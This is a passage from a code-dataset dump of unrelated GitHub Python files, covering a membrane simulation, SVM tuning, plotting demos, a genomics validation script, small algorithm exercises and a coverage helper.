length\n \"m_block\": 100, # [kg] mass attached to end of tether\n \"rho_tether\": 0.1, # [kg/m] mass density tether\n\n # simulation settings\n \"dt\": 0.01, # [s] simulation timestep\n \"t_steps\": 1000, # [-] number of simulated time steps\n \"abs_tol\": 1e-50, # [m/s] absolute error tolerance iterative solver\n \"rel_tol\": 1e-5, # [-] relative error tolerance iterative solver\n \"max_iter\": 1e5, # [-] maximum number of iterations\n\n # physical parameters\n \"g\": 9.807, # [m/s**2] gravitational acceleration\n \"v_w\": [5, 0, 0], # [m/s] wind velocity vector\n 'rho': 1.225, # [kg/ m3] air density\n 'c_d_bridle': 1.05, # [-] drag-coefficient of bridles\n \"d_bridle\": 0.02 # [m] diameter of bridle lines\n}\n\n# calculated parameters\nparams[\"l0\"] = 0#np.sqrt( 2 * (grid_length/(grid_size-1))**2)\nparams[\"m_segment\"] = 1\nparams[\"k\"] = E_t*d\n\n\n# instantiate connectivity matrix and initial conditions array\nc_matrix, init_cond, element_param, params[\"n\"], element_list = cm_and_ic(filename, 1, E_t, params[\"c\"])\n\n# print(init_cond)\n\nif __name__ == \"__main__\":\n import matplotlib.pyplot as plt\n\n x = []\n y = []\n z = []\n for i in range(len(init_cond)):\n x.append(init_cond[i][0][0])\n y.append(init_cond[i][0][1])\n z.append(init_cond[i][0][2])\n\n fig= plt.figure()\n ax = fig.add_subplot(projection=\"3d\")\n labels = ['Mesh particle', 'Mesh spring damper element', 'Analytical solution']\n handles = []\n nodes = ax.scatter(x, y, z, c='red', label=labels[0])\n handles.append(nodes)\n for i, indices in enumerate(c_matrix):\n line = ax.plot([x[indices[0]], x[indices[1]]], [y[indices[0]], y[indices[1]]], [z[indices[0]], z[indices[1]]],\n color='black', label=labels[1])\n if i == 0:\n handles.append(line[0])\n\n deflection, radial_distance = analytical_solution(a, r, q)\n\n circle = np.linspace(0, 2*np.pi, 361)\n for i, distance in enumerate(radial_distance):\n x = np.cos(circle)*abs(distance-np.max(radial_distance))\n y = np.sin(circle)*abs(distance-np.max(radial_distance))\n z = np.ones(len(x),)*deflection[i]\n line = ax.plot(x, y, z, color='green', label=labels[2])\n if i == 0:\n handles.append(line[0])\n\n ax.legend(handles, labels)\n plt.title(\"Hencky problem\")\n plt.show()\n","repo_name":"ARBatchelor/Msc_Alexander_Batchelor","sub_path":"code_Validation/hencky_problem/hencky_problem_input.py","file_name":"hencky_problem_input.py","file_ext":"py","file_size_in_byte":7655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41815990035","text":"from __future__ import annotations\nfrom os import path\nfrom typing import Final\nfrom ..base_action import BaseAction\n\n\n_WORKSPACE_DIR: Final[str] = \"/github/workspace\"\n\n\nclass PHPUnitAction(BaseAction):\n\n _report_path: str\n\n def __init__(self, artifact: str):\n super().__init__()\n\n self._report_path = f\"{_WORKSPACE_DIR}/{artifact}\"\n\n def run(self):\n if not path.exists(self._report_path):\n raise ValueError\n\n print(\"Handling action of the PHPUnit execution results...\")\n with open(self._report_path, \"r\") as file:\n print(file.read())\n\n\n\n\n","repo_name":"zloader/poc-gha-docker-python","sub_path":"src/actions/phpunit_action.py","file_name":"phpunit_action.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12019360285","text":"import gettext\n\nlocale_path = '/home/pi/py-proj/main_app/locale/'\n# zh_trans = gettext.translation('main-app', locale_path, languages=['zh_TW'])\n# en_trans = gettext.translation('main-app', locale_path, languages=['en_US'])\n# en_trans.install()\ngettext.bindtextdomain('main-app', locale_path)\ngettext.textdomain('main-app')\n_ = gettext.gettext \n\n \n\"\"\"\nimport oslo_i18n\n\n\nDOMAIN = 'main-app'\n\n_translators = oslo_i18n.TranslatorFactory(domain=DOMAIN)\n_ = _translators.primary\n_C = _translators.contextual_form\n_P = _translators.plural_form\n_LI = _translators.log_info\n_LW = _translators.log_warning\n_LE = _translators.log_error\n_LC = _translators.log_critical\n\n\ndef get_available_languages():\n return oslo_i18n.get_available_languages(DOMAIN)\n\"\"\"\n","repo_name":"jinsenglin/py-proj","sub_path":"main_app/i18n.py","file_name":"i18n.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28412852436","text":"\"\"\"\nDefinition of TreeNode:\nclass TreeNode:\n def __init__(self, val):\n self.val = val\n self.left, self.right = None, None\n\"\"\"\n\nclass Solution:\n \"\"\"\n @param root: param root: The root of the binary search tree\n @param k1: An integer\n @param k2: An integer\n @return: return: Return all keys that k1<=key<=k2 in ascending order\n \"\"\"\n def searchRange(self, root, k1, k2):\n # write your code here\n import queue\n if root is None:\n return []\n queue = queue.Queue()\n queue.put(root)\n result = []\n \n while not queue.empty():\n node = queue.get()\n if node.val <= k2 and node.val >= k1:\n result.append(node.val)\n if node.left:\n queue.put(node.left)\n if node.right:\n queue.put(node.right)\n \n return result \n","repo_name":"KunyiLiu/algorithm_problems","sub_path":"kunyi/tree_based_dfs/search_range_in_bst.py","file_name":"search_range_in_bst.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41650315630","text":"from sklearn.model_selection import cross_validate\r\nfrom sklearn.svm import SVC\r\nfrom sklearn.metrics import classification_report,confusion_matrix\r\nfrom sklearn import metrics\r\n\r\nfrom .olahFile import encodingInversTransfom\r\n\r\n\r\nfrom .preprocessing import scaling\r\nfrom .preprocessing import splitData\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\nC = tuple(np.arange(0.1,3.7,0.5)) \r\nkernel = ('linear', 'poly', 'rbf', 'sigmoid')\r\nmax_iter = tuple(np.arange(-1, 1000, 400))\r\ndegree = tuple(np.arange(1, 1000, 250))\r\ngamma = ('scale', 'auto')\r\ncoef0 = tuple(np.arange(0, 5.1, 1.0))\r\n\r\n\r\npoly = []\r\nrbf = []\r\nlinear = []\r\nsigmoid = []\r\nsplit_data = []\r\n\r\n\r\ndef prosesLinear(C:tuple, max_iter:tuple, x_train: 'array', y_train: 'array', cv : int):\r\n for i in C :\r\n for j in max_iter:\r\n svm = SVC(\r\n kernel = 'linear',\r\n C = i,\r\n max_iter = j\r\n )\r\n\r\n results = cross_validate(estimator = svm,\r\n X = x_train,\r\n y = y_train,\r\n cv = cv)\r\n\r\n \r\n score = float(results['test_score'].mean())\r\n\r\n linear.append([score, i, j]) \r\n\r\n\r\n\r\ndef prosesRbf(C:tuple, max_iter:tuple, gamma:tuple, x_train: 'array', y_train: 'array', cv : int):\r\n for i in C:\r\n for j in max_iter:\r\n for k in gamma:\r\n svm = SVC(\r\n kernel = 'rbf',\r\n C = i,\r\n max_iter = j,\r\n gamma = k\r\n )\r\n\r\n results = cross_validate(estimator=svm,\r\n X=x_train,\r\n y=y_train,\r\n cv=cv)\r\n\r\n \r\n score = float(results['test_score'].mean())\r\n \r\n rbf.append([score, i, j, k]) \r\n\r\n\r\n\r\ndef prosesSigmoid(C:tuple, max_iter:tuple, gamma:tuple, coef0:tuple, x_train: 'array', y_train: 'array', cv:int):\r\n for i in C:\r\n for j in max_iter:\r\n for k in gamma:\r\n for l in coef0:\r\n svm = SVC(\r\n kernel = 'sigmoid',\r\n C = i,\r\n max_iter = j,\r\n gamma = k,\r\n coef0 = l\r\n )\r\n\r\n results = cross_validate(estimator=svm,\r\n X = x_train,\r\n y = y_train,\r\n cv = cv)\r\n\r\n \r\n score = float(results['test_score'].mean())\r\n\r\n sigmoid.append([score, i, j, k, l]) \r\n\r\n\r\n\r\ndef prosesPoly(C:tuple, max_iter:tuple, gamma:tuple, coef0:tuple, degree:tuple, x_train: 'array', y_train: 'array', cv:int):\r\n for i in C:\r\n for j in max_iter:\r\n for k in gamma:\r\n for l in coef0:\r\n for m in degree:\r\n svm = SVC(\r\n kernel = 'sigmoid',\r\n C = i,\r\n max_iter = j,\r\n gamma = k,\r\n coef0 = l,\r\n degree = m\r\n )\r\n\r\n results = cross_validate(estimator=svm,\r\n X = x_train,\r\n y = y_train,\r\n cv = cv)\r\n\r\n \r\n score = float(results['test_score'].mean())\r\n\r\n poly.append([score, i, j, k, l,m]) \r\n\r\n\r\ndef akurasiTiapSplit(x, y, iterasi):\r\n for i in range(5):\r\n temp = []\r\n dTest = 0.0\r\n for j in range(iterasi):\r\n dTest += 0.1\r\n\r\n x_train, x_test, y_train, y_test = splitData(x, y, dTest, 101)\r\n\r\n\r\n svm = SVC(\r\n kernel = 'rbf',\r\n C = 3.6,\r\n max_iter = 799,\r\n gamma = 'scale' \r\n ) \r\n \r\n svm.fit(x_train,y_train)\r\n y_pred = svm.predict(x_test)\r\n score = metrics.accuracy_score(y_test, y_pred)\r\n \r\n temp.append([score, round(dTest, 1)])\r\n split_data.append(temp)\r\n\r\n\r\n\r\ndef prosesKernel(x, y, cv, C:list, max_iter:list, gamma:list, coef0:list, degree:list):\r\n prosesLinear(C, max_iter, x, y, cv)\r\n prosesRbf(C, max_iter, gamma, x, y, cv)\r\n prosesSigmoid(C, max_iter, gamma, coef0, x, y, cv)\r\n prosesPoly(C, max_iter, gamma, coef0, degree, x, y, cv)\r\n akurasiTiapSplit(x, y, 5)\r\n \r\n \r\n\r\ndef hasilKlasifikasi(banding1:list, banding2:list)->pd.DataFrame:\r\n\r\n hasil_klasifikasi = classification_report(banding1, banding2,output_dict=True)\r\n\r\n hasil_klasifikasi.pop('macro avg')\r\n hasil_klasifikasi.pop('weighted avg')\r\n hasil_klasifikasi['mild'].pop('support')\r\n hasil_klasifikasi['severe'].pop('support')\r\n\r\n hasil_klasifikasi = pd.DataFrame(hasil_klasifikasi).transpose()\r\n hasil_klasifikasi.iloc[2,:-1] = np.nan\r\n \r\n return hasil_klasifikasi\r\n\r\n\r\ndef prosesTrain(x_train:list, y_train:list)->object: \r\n svm = SVC(\r\n kernel = 'rbf',\r\n C = 3.6,\r\n max_iter = 799,\r\n gamma = 'auto'\r\n )\r\n svm.fit(x_train,y_train)\r\n \r\n return svm\r\n \r\n\r\ndef predictDataTesting(x, y, svm, encode:object):\r\n\r\n y_pred = svm.predict(x)\r\n score = metrics.accuracy_score(y, y_pred)\r\n\r\n y_testNominal = encodingInversTransfom(encode, y)\r\n y_predictNominal = encodingInversTransfom(encode, y_pred)\r\n\r\n cnfMatrix = confusion_matrix(y_testNominal, y_predictNominal)\r\n\r\n hasil_klasifikasi = hasilKlasifikasi(y_testNominal, y_predictNominal)\r\n # y_testNominal = encodingInversTransfom(encodeSeverity,y_test)\r\n # y_predictNominal = encodingInversTransfom(encodeSeverity, y_pred)\r\n\r\n banding = pd.DataFrame({'y_test': y_testNominal, 'y_pred': y_predictNominal}, columns=['y_test', 'y_pred'])\r\n\r\n\r\n return score, cnfMatrix, hasil_klasifikasi, banding, y_pred\r\n\r\ndef predictNewData(data:'Dataframe', svm:object, encode:object ):\r\n X_dummy_scaled = scaling(data.iloc[:,:-1])\r\n y_dummy_scaled = data.iloc[:,-1]\r\n\r\n score_dummy, cnfMatrix_dummy, hasil_klasifikasi_dummy, banding_dummy, y_pred = predictDataTesting(X_dummy_scaled, y_dummy_scaled, svm, encode)\r\n\r\n return score_dummy, cnfMatrix_dummy, hasil_klasifikasi_dummy, banding_dummy \r\n \r\n ","repo_name":"kazuma313/Penelitian","sub_path":"modul/proses.py","file_name":"proses.py","file_ext":"py","file_size_in_byte":6483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18322910004","text":"from turtle import Turtle\nfrom random import *\n\nt = Turtle()\nt.speed(10)\nt.shape('turtle')\n\nn = 50\nfor i in range(n):\n t.forward(randint(-30, 30))\n t.left(randint(0, 360))\n t.backward(randint(-30, 30))\n t.right(randint(0, 360))\n","repo_name":"stsln/python","sub_path":"Практика програмирвания Python (2020)/Лабораторная работа №3/1ypr.py","file_name":"1ypr.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74653536553","text":"import numpy as np\r\nimport random\r\n\r\n\r\nclass Nureal():\r\n lerning_rate = 0.4\r\n\r\n def __init__(self, size, id=None,weight= None,baises=None):\r\n if weight == None :\r\n self.weight = np.array([np.random.rand(size[i + 1], size[i]) for i in range(len(size) - 1)],dtype=np.ndarray)\r\n else:\r\n self.weight = weight\r\n if baises == None:\r\n self.biases = np.array([np.random.rand(j, 1) for j in size[1:]],dtype=np.ndarray)\r\n else:\r\n self.biases = baises\r\n # self.weight = [np.ones((size[i + 1], size[i])) for i in range(len(size) - 1)]\r\n # self.biases = [np.ones((j, 1)) for j in size[1:]]\r\n self.changed_weight = []\r\n self._output = []\r\n self._input = []\r\n self.point = 0\r\n self.id = id\r\n self.hidden_layers = []\r\n self.all_layers = []\r\n self.hidden_layers_error = []\r\n\r\n def forward(self, input):\r\n self._output = []\r\n self.hidden_layers = []\r\n self.all_layers = []\r\n self.hidden_layers_error = []\r\n input = [[i] for i in input]\r\n self._input = np.array(input, dtype=np.ndarray)\r\n self.all_layers = [self._input]\r\n input = np.array(input)\r\n for l in range(len(self.weight)):\r\n if l == len(self.weight) - 1:\r\n self._output = np.add(np.matmul(self.weight[l], input), self.biases[l])\r\n continue\r\n input = np.add(np.matmul(self.weight[l], input), self.biases[l])\r\n input = self.activation_sigmoid(input)\r\n self.hidden_layers.append(input)\r\n self.all_layers.append(input)\r\n self._output = self.activation_sigmoid(self._output)\r\n # self._output = self.activation_relue(self._output)\r\n self.all_layers.append(self._output)\r\n return self._output\r\n\r\n def activation_relue(self, layer):\r\n layer = np.array(layer, dtype=np.ndarray)\r\n k = layer.argmax()\r\n for i in range(len(layer)):\r\n if i == k:\r\n for j in range(len(layer[i])):\r\n layer[i][j] = float(1.0)\r\n else:\r\n for j in range(len(layer[i])):\r\n layer[i][j] = float(0.0)\r\n return layer\r\n\r\n def activation_softmax(self, layer):\r\n m = (np.exp(layer))\r\n return m / m.sum()\r\n\r\n def activation_sigmoid(self, layer):\r\n layer = layer.astype(float)\r\n try:\r\n np.exp(-layer)\r\n except TypeError:\r\n print(layer)\r\n return 1 / (1 + np.exp(-layer))\r\n\r\n @staticmethod\r\n def sigmoiddelta(error, output):\r\n ones = [[1] for i in range(len(output))]\r\n return np.multiply(error, np.multiply(output, np.subtract(ones, output)))\r\n\r\n @staticmethod\r\n def error_calculation(result, output):\r\n error = np.subtract(output, result)\r\n return error\r\n\r\n @staticmethod\r\n def delta(error):\r\n return (np.multiply(Nureal.lerning_rate, error))\r\n\r\n @staticmethod\r\n def transpose(m):\r\n return np.matrix.transpose(m)\r\n\r\n def backward(self, result):\r\n result = [[i] for i in result]\r\n error = Nureal.error_calculation(result, self._output)\r\n self.hidden_layers_error.append(error)\r\n for i in range(len(self.hidden_layers)):\r\n temp = np.matmul(Nureal.transpose(self.weight[-1 - i]), self.hidden_layers_error[0])\r\n # temp = np.matmul(Nureal.transpose(self.weight[-1 - i]),\r\n # Nureal.sigmoiddelta(self.hidden_layers_error[0],self.all_layers[-1-i]))\r\n self.hidden_layers_error.insert(0, temp)\r\n\r\n for i in range(len(self.weight)):\r\n temp = np.matmul(Nureal.sigmoiddelta(self.hidden_layers_error[i], self.all_layers[i + 1]),\r\n Nureal.transpose(self.all_layers[i]))\r\n\r\n self.weight[i] = np.subtract(self.weight[i], Nureal.delta(temp))\r\n self.biases[i] = np.subtract(self.biases[i],\r\n Nureal.delta(\r\n Nureal.sigmoiddelta(self.hidden_layers_error[i], self.all_layers[i + 1])))\r\n\r\n self._output = []\r\n return error\r\na = Nureal([2,4,1])\r\nb = [[1,1],[1,0],[0,0],[0,1]]\r\n\r\nfor j in range(600):\r\n for i in b:\r\n output = a.forward(i)\r\n if i == [0,0] or i == [1,1]:\r\n a.backward([0])\r\n else:\r\n a.backward([1])\r\n print(j)\r\nfor i in b:\r\n print(i,a.forward(i))\r\n","repo_name":"bodhisatw/nn-genatic-python","sub_path":"NN_1.py","file_name":"NN_1.py","file_ext":"py","file_size_in_byte":4531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17385463927","text":"from queue import *\nfrom utilDataStructure import *\n\nd = UtilDataStructure()\n\nclass AnagramUsingStack:\n s = Queue()\n def addToQueue(cls,lower_range,upper_range):\n low = lower_range\n while low < 2 :\n low += 1\n for i in range(low,upper_range):\n if d.primeAnagram(i):\n cls.s.enqueue(i)\n \n \n def reversePrimeAnagram(cls):\n arr = ['Anagram prime number from higher range to lower range']\n while cls.s.size() != 0:\n num = cls.s.dequeue()\n arr.append(num)\n return arr\n\nan = AnagramUsingStack()\ntry:\n lower_range = int(input('Enter lower range : '))\n upper_range = int(input('Enter upper range : '))\nexcept ValueError:\n print('Please enter suitable input and try again : ')\n\nan.addToQueue(lower_range,upper_range)\narray = an.reversePrimeAnagram()\nprint(array)\n","repo_name":"santoshikalaskar/Basic_Advance_python_program","sub_path":"Python-dataStructure/dataStructure/anagramUsingQueue.py","file_name":"anagramUsingQueue.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30798309556","text":"empty_list = []\neven = [2, 4, 6, 8]\nodd = [1, 3, 5, 7, 9]\n\nnumbers = even + odd\nprint(numbers)\n\n# Returns a list of integers\nsorted_numbers = sorted(numbers)\nprint(sorted_numbers)\nprint(numbers)\n\n# Returns a list of individual strings\ndigits = sorted(\"432985617\")\nprint(digits)\n\n# We can create an un-sorted list of individual strings using the list class initializer\ndigits_list = list(\"432985617\")\nprint(digits)\n\n# There are various ways to copy lists\nmore_numbers = list(numbers)\nmore_numbers_2 = numbers[:]\nmore_numbers_3 = numbers.copy() # This is the easiest way\n","repo_name":"sheikh210/LearnPython","sub_path":"data_structures/lists/lists_creation.py","file_name":"lists_creation.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"69926570472","text":"'''\nCreated on 2 апр. 2019 г.\n\n@author: Stalker\n'''\n\nimport time\nfrom datetime import datetime\n\nimport numpy as np\n\nimport matplotlib as mpl\nmpl.use(\"TkAgg\")\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2Tk\nimport matplotlib.ticker as ticker\n\ndef _print_event(event, attr_list):\n print()\n print('**** {} ****'.format(event.name))\n print(' ' + str(type(event)))\n for attr in attr_list:\n title = 'event.' + attr\n value = getattr(event, attr)\n line = ' {title:20}: {value}'.format(title=title, value=value)\n print(line)\n\ndef onMouseEvent(event):\n # type: (matplotlib.backend_bases.MouseEvent) -> None\n ''' Обработчик событий, связанных с мышью '''\n attr_list = ['name',\n 'dblclick', 'button', 'key',\n 'xdata', 'ydata',\n 'x', 'y',\n 'inaxes',\n 'step',\n 'guiEvent']\n _print_event(event, attr_list)\n\ndef onKeyEvent(event):\n # type: (matplotlib.backend_bases.KeyEvent) -> None\n ''' Обработчик событий, связанных с клавиатурой '''\n attr_list = ['name',\n 'key',\n 'xdata', 'ydata',\n 'x', 'y',\n 'inaxes',\n 'guiEvent']\n _print_event(event, attr_list)\n\n\ndef events():\n # Расчитываем функцию\n x = np.arange(0, 5 * np.pi, 0.01)\n y = np.sin(x) * np.cos(3 * x)\n\n # Нарисовать график\n fig = plt.figure()\n plt.plot(x, y)\n\n # События, связанные с мышью\n button_press_event_id = fig.canvas.mpl_connect('button_press_event',\n onMouseEvent)\n button_release_event_id = fig.canvas.mpl_connect('button_release_event',\n onMouseEvent)\n scroll_event_id = fig.canvas.mpl_connect('scroll_event',\n onMouseEvent)\n\n # События, связанные с клавишами\n key_press_event_id = fig.canvas.mpl_connect('key_press_event',\n onKeyEvent)\n key_release_event_id = fig.canvas.mpl_connect('key_release_event',\n onKeyEvent)\n\n plt.show()\n\n # Отпишемся от событий\n fig.canvas.mpl_disconnect(button_press_event_id)\n fig.canvas.mpl_disconnect(button_release_event_id)\n fig.canvas.mpl_disconnect(scroll_event_id)\n fig.canvas.mpl_disconnect(key_press_event_id)\n fig.canvas.mpl_disconnect(key_release_event_id)\n\n# custom toolbar with lorem ipsum text\nclass CustomToolbar(NavigationToolbar2Tk):\n def __init__(self,canvas_,parent_):\n self.toolitems = (\n ('Home', 'Lorem ipsum dolor sit amet', 'home', 'home'),\n ('Back', 'consectetuer adipiscing elit', 'back', 'back'),\n ('Forward', 'sed diam nonummy nibh euismod', 'forward', 'forward'),\n (None, None, None, None),\n ('Pan', 'tincidunt ut laoreet', 'move', 'pan'),\n ('Zoom', 'dolore magna aliquam', 'zoom_to_rect', 'zoom'),\n (None, None, None, None),\n ('Subplots', 'putamus parum claram', 'subplots', 'configure_subplots'),\n ('Save', 'sollemnes in futurum', 'filesave', 'save_figure'),\n )\n NavigationToolbar2Tk.__init__(self,canvas_,parent_)\n\n def pan(self):\n NavigationToolbar2Tk.pan(self)\n self.mode = \"I'm panning!\" #<--- whatever you want to replace \"pan/zoom\" goes here\n self.set_message(self.mode)\n\n def zoom(self):\n NavigationToolbar2Tk.zoom(self)\n self.mode = \"I'm zooming!\" #<--- whatever you want to replace \"zoom rect\" goes here\n self.set_message(self.mode)\n\nclass MyApp(object):\n def __init__(self,root):\n self.root = root\n self._init_app()\n\n # here we embed the a figure in the Tk GUI\n def _init_app(self):\n self.figure = mpl.figure.Figure()\n self.ax = self.figure.add_subplot(111)\n self.canvas = FigureCanvasTkAgg(self.figure,self.root)\n self.toolbar = CustomToolbar(self.canvas,self.root)\n self.toolbar.update()\n self.plot_widget = self.canvas.get_tk_widget()\n self.plot_widget.pack(side=tk.TOP, fill=tk.BOTH, expand=1)\n self.toolbar.pack(side=tk.TOP, fill=tk.BOTH, expand=1)\n self.canvas.show()\n\n # plot something random\n def plot(self):\n self.ax.imshow(np.random.normal(0.,1.,size=[100,100]),cmap=\"hot\",aspect=\"auto\")\n self.figure.canvas.draw()\n\ndef navigator():\n root = tk.Tk()\n app = MyApp(root)\n app.plot()\n root.mainloop()\n\ndef hist(ax, xdate, candles, size):\n ''' '''\n\ndef simple():\n x = np.asarray(range(20))\n y1 = 4*x\n y2 = [i**2 for i in x]\n\n fig, ax = plt.subplots(figsize=(8, 6))\n ax.set_title(\"Графики зависимостей: y1=4*x, y2=x^2\", fontsize=16)\n ax.set_xlabel(\"x\", fontsize=14) \n ax.set_ylabel(\"y1, y2\", fontsize=14)\n ax.grid(which=\"major\", linewidth=1.2)\n ax.grid(which=\"minor\", linestyle=\"--\", color=\"gray\", linewidth=0.5, alpha=0.5)\n\n ax.scatter(x, y1, c=\"red\", label=\"y1 = 4*x\")\n ax.plot(x, y2, label=\"y2 = x^2\")\n ax.bar(x, y2-y1, bottom=x, color='green', width=0.5, zorder=1, label=\"bars\")\n\n ax.axhline(y=50, color=\"red\")\n\n ax.legend()\n ax.text(.200, .400, \"Text\"\n , color='blue', fontsize=16\n ,horizontalalignment='left', verticalalignment='center'\n ,transform=ax.transAxes\n )\n\n ax.xaxis.set_minor_locator(ticker.AutoMinorLocator())\n ax.yaxis.set_minor_locator(ticker.AutoMinorLocator())\n\n ax.xaxis.set_zorder(-1) # спрятать сетку под бары (в вызове grid это не работает)\n ax.yaxis.tick_right() # ось справа\n\n ax.tick_params(which='major', length=20, width=2)\n ax.tick_params(which='minor', length=1, width=1)\n\n #ax.set_xmargin(0.2) # Расширение интервала на 20%\n #ax.set_ymargin(-0.1) # Обрезание на 10%\n ax.margins(0.2, -0.1) # Тот же эффект (возможны различия без автошкалирования)\n\n ax.set_xbound(2, 8) # В чем отличие ???\n ax.set_xlim(1, 10) # Установка видимой области, перекрывает margins\n ax.set_ybound(0, 200) # В чем отличие ???\n #ax.autoscale(enable=True, axis='y', tight=True) # tight обнуляет margin\n\n #ax.set_axis_off() # Выключение отображения осей\n\n ax.set_xticks([2, 4, 6, 8])\n ax.set_xticklabels([\"1\", \"3\", \"5\"])\n\n print(\"bounds\", str(ax.get_xbound()), str(ax.get_ybound()))\n print(\"zorder:\", str(ax.get_axisbelow()))\n print(\"scale:\", ax.get_xscale(), ax.get_yscale())\n print(\"frame:\", str(ax.get_frame_on()), str(ax.get_aspect()), str(ax.get_adjustable()))\n print(\"ticks:\", str(ax.get_xticks()))\n tl = ax.get_xticklabels()\n\n plt.show()\n\nimport tkinter as tk\ndef mptk():\n root = tk.Tk()\n parent = tk.Frame(root,width=1500,height=100,bg=\"darkred\", bd=20) # bd обязателен\n\n fig = plt.Figure(figsize=(5, 4), dpi=100)\n t = np.arange(0, 3, .01)\n fig.add_subplot(111).plot(t, 2 * np.sin(2 * np.pi * t))\n\n canvas = FigureCanvasTkAgg(fig, master=root) # A tk.DrawingArea.\n canvas.draw()\n canvas.get_tk_widget().pack(side=tk.TOP, fill=tk.BOTH, expand=1)\n\n toolbar = NavigationToolbar2Tk(canvas, root)\n toolbar.update()\n canvas.get_tk_widget().pack(side=tk.TOP, fill=tk.BOTH, expand=1)\n\n#mptk()\n#simple()\n#hist2()\n#axis()\n","repo_name":"stalker138/Python","sub_path":"Plot/MatPlot.py","file_name":"MatPlot.py","file_ext":"py","file_size_in_byte":7830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13996217258","text":"import pandas as pd\nimport parse_data as parser\nimport numpy as np\nimport joblib\nfrom main_params import MainParams\nfrom liftover import get_lifter\n\np = MainParams()\ntrain_info, valid_info, test_info, _ = parser.parse_sequences(p)\ninfos = train_info + valid_info + test_info\ndf = pd.read_csv(\"data/validation/fulco2016_original.tsv\", sep=\"\\t\")\ndf.loc[df['Set'] == 'MYC Tiling', \"Gene\"] = \"MYC\"\ndf.loc[df['Set'] == 'GATA1 Tiling', \"Gene\"] = \"GATA1\"\na = df['Gene'].unique()\nhead = joblib.load(f\"{p.pickle_folder}heads.gz\")[\"hg38\"][\"expression\"]\nf5_tracks = []\nfor track in head:\n if \"FANTOM5\" in track and \"K562\" in track:\n f5_tracks.append(track)\nprint(f\"FANTOM5 K562 tracks {len(f5_tracks)}\")\nload_info = []\ngene_names = {}\nfound_genes = set()\nfor info in infos:\n ig = info[6]\n if ig in a:\n mid = info[1] // p.bin_size\n # len(load_info) is index to link info[1] (tss) to loaded values\n gene_names.setdefault(ig, []).append([len(load_info), info[1]])\n load_info.append([info[0], mid])\n found_genes.add(ig)\n\nnot_found_genes = set(a) - found_genes\nprint(f\"Not found {len(not_found_genes)} genes\")\nprint(df.shape)\ndf = df[~df.Gene.isin(not_found_genes)]\nprint(df.shape)\n\nprint(f\"Load info {len(load_info)}\") \n\nprint(\"Loading ground truth tracks\")\ngt = parser.par_load_data(load_info, f5_tracks, p)\nprint(gt.shape)\ngt = np.mean(gt, axis=-1)\nprint(gt.shape)\n# Major TSS is the one with the biggest average value in K562\nfor gene in gene_names:\n max_val = -1\n max_tss = -1\n for tss in gene_names[gene]:\n if gt[tss[0]] > max_val:\n max_val = gt[tss[0]]\n max_tss = tss[1]\n df.loc[df['Gene'] == gene, 'Gene'] = max_tss + 1 # not 0 based!\n \ndf[\"mid\"] = df[\"start\"] + (df[\"end\"] - df[\"start\"]) // 2\ndf = df.rename(columns={'Gene': 'tss', \"CRISPRi Score\": \"score\"})\n\n# TSS is already hg38\nconverter = get_lifter('hg19', 'hg38')\ninds = []\nfor index, row in df.iterrows(): \n try:\n df.at[index,'mid'] = converter[row[\"chr\"]][row[\"mid\"]][0][1]\n except:\n inds.append(index)\n# Remove validation that could not be lifted\ndf.drop(df.index[inds], inplace=True)\ndf = df[np.abs(df[\"mid\"] - df[\"tss\"]) > 2000]\ndf_enhancer_screen_pos = df[df[\"score\"] < -0.5].copy()\ndf_enhancer_screen_pos['Significant'] = True\n\ndf_enhancer_screen_neg = df[df[\"score\"] > 0.0].copy()\ndf_enhancer_screen_neg['Significant'] = False\n\ndf = pd.concat([df_enhancer_screen_pos, df_enhancer_screen_neg], ignore_index=True, axis=0)\nprint(df['Significant'].value_counts())\n\ndf1 = df[df.Set == \"Protein Coding Gene Promoters\"]\ndf1 = df1[[\"chr\", \"tss\", \"mid\", 'Significant']]\ndf1.to_csv(\"data/validation/fulco2016_processed.tsv\", index=False, sep=\"\\t\")\n\ndf2 = df[df['Set'].isin([\"MYC Tiling\", \"GATA1 Tiling\"])]\ndf2 = df2[[\"chr\", \"tss\", \"mid\", 'Significant', 'score']]\ndf2.to_csv(\"data/validation/fulco2016_tiling.tsv\", index=False, sep=\"\\t\")","repo_name":"umarov90/Chromix","sub_path":"validation/process_fulco2016.py","file_name":"process_fulco2016.py","file_ext":"py","file_size_in_byte":2912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3217010659","text":"\nfrom changes.config import db\nfrom changes.constants import Status\nfrom changes.models.build import Build\nfrom changes.models.filecoverage import FileCoverage\nfrom changes.models.job import Job\nfrom changes.models.project import Project\nfrom changes.models.source import Source\nfrom typing import Iterable, NamedTuple, Set # NOQA\n\n\ndef get_coverage_by_source_id(source_id):\n \"\"\"\n Takes a source_id and returns a dictionary of coverage for that source_id. The\n coverage is generated for the most recently finished builds for each project.\n\n The dictionary maps file names to a string of the form 'UNCCCNCU', where U means\n 'uncovered', C means 'covered' and 'N' means 'no coverage info'.\n \"\"\"\n source = Source.query.get(source_id)\n\n projects = Project.query.filter(\n Project.repository_id == source.repository_id\n )\n\n newest_build_ids = set()\n for project in projects:\n b_id = db.session.query(Build.id).filter(\n Build.project_id == project.id,\n Build.source_id == 